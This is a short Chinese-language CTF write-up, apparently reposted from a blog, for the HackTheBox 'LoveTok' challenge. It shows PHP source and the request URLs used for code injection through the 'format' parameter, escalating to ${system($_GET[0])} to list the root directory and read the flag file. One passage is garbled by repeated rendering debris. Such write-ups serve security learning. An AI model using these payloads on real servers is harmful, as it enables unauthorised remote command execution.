HackTheBox-LoveTok
2023-12-20 07:04:42
hackthebox
文章目录
LoveTok
注册账号:
1.账号名与全名一致 eg 账号guiltyfet 全名guilty fet(中间有空格)
2.下载openvpn(下载file导入openvpn)
下载源码并分析
TimeController.php的TimeController的index(
r
o
u
t
e
r
)
中有可控的输入
router)中有可控的输入
router)中有可控的输入_GET[‘format’]。
<?php
class TimeController
{
public function index($router)
{
$format = isset($_GET['format']) ? $_GET['format'] : 'r';
$time = new TimeModel($format);
return $router->view('index', ['time' => $time->getTime()]);
}
}
看到参数 $format 被addslashes()过滤了
http://188.166.175.58:30082/?format=$%7Bphpinfo()%7D
http://188.166.175.58:30082/?format=${system($_GET[0])}&0=ls /
http://188.166.175.58:30082/?format=${system($_GET[0])}&0=cat%20/flage3lXD
文章来源:https://blog.csdn.net/weixin_51387754/article/details/135084942
本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。 如若内容造成侵权/违法违规/事实不符,请联系我的编程经验分享网邮箱:veading@qq.com进行投诉反馈,一经查实,立即删除!
本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。 如若内容造成侵权/违法违规/事实不符,请联系我的编程经验分享网邮箱:veading@qq.com进行投诉反馈,一经查实,立即删除!